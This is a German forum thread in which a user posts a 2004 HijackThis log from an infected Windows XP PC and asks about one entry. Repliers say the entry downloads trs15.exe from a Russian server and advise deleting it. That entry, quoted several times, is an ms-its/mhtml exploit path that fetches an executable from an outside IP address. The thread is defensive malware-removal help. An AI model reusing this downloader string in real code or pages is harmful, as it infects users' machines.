Logfile of HijackThis v1.98.2
Scan saved at 15:51:54, on 28.12.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\AVPersonal\AVGUARD.EXE
C:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\WINDOWS\System32\r_server.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\eDonkey2000\edonkey2000.exe
C:\Programme\AVPersonal\AVGNT.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\Programme\WinZip\WZQKPICK.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\Dokumente und Einstellungen\dkoman\Desktop\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [PMXInit] C:\WINDOWS\System32\pmxinit.exe
O4 - HKLM\..\Run: [Anmeldung] c:\install\röhl.bat
O4 - HKLM\..\Run: [AVGCtrl] "C:\Programme\AVPersonal\AVGNT.EXE" /min
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Programme\WinZip\WZQKPICK.EXE
O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.co...?1098772350288
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = Trendmobil.de
O17 - HKLM\Software\..\Telephony: DomainName = Trendmobil.de
O17 - HKLM\System\CCS\Services\Tcpip\..\{10876C3C-4DB7-484F-A713-A59D0BF6D2DD}: NameServer = 192.168.0.1
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = Trendmobil.de
O17 - HKLM\System\CS1\Services\Tcpip\..\{10876C3C-4DB7-484F-A713-A59D0BF6D2DD}: NameServer = 192.168.0.1
O18 - Protocol: ActLink - {2A0C35F4-82A3-4C80-919D-7879FEE79DF6} - C:\Programme\ACT\actlink.dll

?????????
O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

Das da über mir ist doch was oder?

das andere darunter von Windows weiss nicht aber war zuvor nicht drauf.

Wenn das erste was gesagt ist wie läuft das dann ab durch hochfahren des rechners führt er dann den link aus oder nur wenn ins internet gehe oder wie?

An deiner Stelle wuerde ich auf E-Donkey verzichten !! frueher oda spaeter faengst du dir damit irgendetwas ein !!

kk ist eh von einer aushilfskraft drauf gemacht worden.

aber ist das nun was?

bin kein Experte da koennen dir die anderen bestimmt mehr sagen !! du kannst es aber mal automatisch auswerten lassen und zwar hier :

http://hijackthis.de/

vielleicht hilft dir das schon weiter ansonsten mal abwarten was die Experten dazu sagen !

thx hat mir schon gut geholfen es besser zu verstehen doch meine frage bleibt immer noch offen.

O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

ist dailer trojan oder sonst was?

Zitat:

Zitat von Fright

O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

Hatten wir hier schon mal, benutze die Suchfunktion des Boardes wenn Du es genau wissen willst.
Ansonsten LÖSCHE es, es zeigt auf eine russische Seite und würde dort (wenn noch existent) beim Start die Datei trs15.exe herunterladen

Ihre Suchanfrage erzielte keine Treffer. Bitte versuchen Sie es mit anderen Suchbegriffen.

Die folgenden Wörter sind sehr allgemein und wurden in der Suchanfrage ignoriert : http://82.179.166.145/x15.chm::/trs15.exe

Hatte dies schonmal gemacht und den Link in der Schlüsselsuche eingetragen. Wo trägst du in ein? Brauch ja nicht immer beitrag machen wenn doch gibt und nur falsch gesucht habe.

Was kann da los sein? Wenn weg ist ist doch weg.